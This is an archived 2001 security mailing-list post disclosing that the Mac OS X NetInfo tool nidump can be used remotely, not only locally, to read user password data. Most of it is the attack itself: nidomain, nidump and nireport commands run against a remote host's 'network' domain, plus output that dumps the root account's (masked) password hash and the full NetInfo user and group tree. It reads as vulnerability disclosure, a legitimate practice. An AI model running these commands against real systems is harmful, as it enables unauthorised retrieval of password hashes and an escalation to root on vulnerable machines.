I have seen mention of nidump being used local to an OSX box to take
root... I have found that with the use of "tags" it is also a remote
root. I have not notified apple due to the fact that they did nothing
about the original local
exploit. Any machine with a "network" nidomain is vulnerable. It may
also be possible to spoof a connect to the "local" domain however I have
not tested this.
-KF
bugtraq id 2953
object nidump
class Design Error
cve CVE-MAP-NOMATCH
remote No
local Yes
published Jun 26, 2001
updated Sep 04, 2001
vulnerable Apple MacOS X 10.0
Apple MacOS X 10.0.1
Apple MacOS X 10.0.2
Apple MacOS X 10.0.3
Apple MacOS X 10.0.4
the above needs updated to remote Yes
[dhcpxxx:~] elguapo% nidomain -l xxx.xxx.net
tag=network udp=797 tcp=798
tag=local udp=795 tcp=796
[dhcpxxxxxx:~] elguapo% nidump -t xxx.xxx.net/network passwd
root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh
[dhcpxxx:~] elguapo% nireport -t xxx.xxx.net/network /users name uid
passwd
root 0 xxxxxxxxx.
[dhcpxxxx:~] elguapo% nidump -r / -t xxx.xxxx.net/network
{
"master" = ( "localhost/network" );
CHILDREN = (
{
"name" = ( "machines" );
CHILDREN = (
{
"name" = ( "localhost" );
"ip_address" = ( "xxx.xxx.xxx.xxx" );
"serves" = ( "./network", "localhost/local" );
}
)
},
{
"name" = ( "users" );
CHILDREN = (
{
"name" = ( "root" );
"passwd" = ( "xxxxxxxxx." );
"uid" = ( "0" );
"gid" = ( "0" );
"change" = ( "0" );
"expire" = ( "0" );
"realname" = ( "System Administrator" );
"home" = ( "/private/var/root" );
"shell" = ( "/bin/tcsh" );
}
)
},
{
"name" = ( "groups" );
CHILDREN = (
{
"name" = ( "nobody" );
"gid" = ( "-2" );
"passwd" = ( "*" );
},
{
"name" = ( "nogroup" );
"gid" = ( "-1" );
"passwd" = ( "*" );
},
{
"passwd" = ( "*" );
"name" = ( "wheel" );
"gid" = ( "0" );
"users" = ( "xxxxx" );
},
{
"name" = ( "daemon" );
"gid" = ( "1" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "kmem" );
"gid" = ( "2" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "sys" );
"gid" = ( "3" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "tty" );
"gid" = ( "4" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "operator" );
"gid" = ( "5" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "mail" );
"gid" = ( "6" );
"passwd" = ( "*" );
},
{
"name" = ( "bin" );
"gid" = ( "7" );
"passwd" = ( "*" );
},
{
"name" = ( "staff" );
"gid" = ( "20" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "guest" );
"gid" = ( "31" );
"passwd" = ( "*" );
"users" = ( "root" );
},
{
"name" = ( "utmp" );
"gid" = ( "45" );
"passwd" = ( "*" );
},
{
"name" = ( "uucp" );
"gid" = ( "66" );
"passwd" = ( "*" );
},
{
"name" = ( "dialer" );
"gid" = ( "68" );
"passwd" = ( "*" );
},
{
"name" = ( "network" );
"gid" = ( "69" );
"passwd" = ( "*" );
},
{
"name" = ( "www" );
"gid" = ( "70" );
"passwd" = ( "*" );
},
{
"passwd" = ( "*" );
"name" = ( "admin" );
"gid" = ( "80" );
"users" = ( "xxxxxx" );
},
{
"name" = ( "unknown" );
"gid" = ( "99" );
"passwd" = ( "*" );
}
)
},
{
"name" = ( "aliases" );
},
{
"name" = ( "fax_modems" );
},
{
"name" = ( "mounts" );
},
{
"name" = ( "printers" );
}
)
}
This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 21:17:44 PDT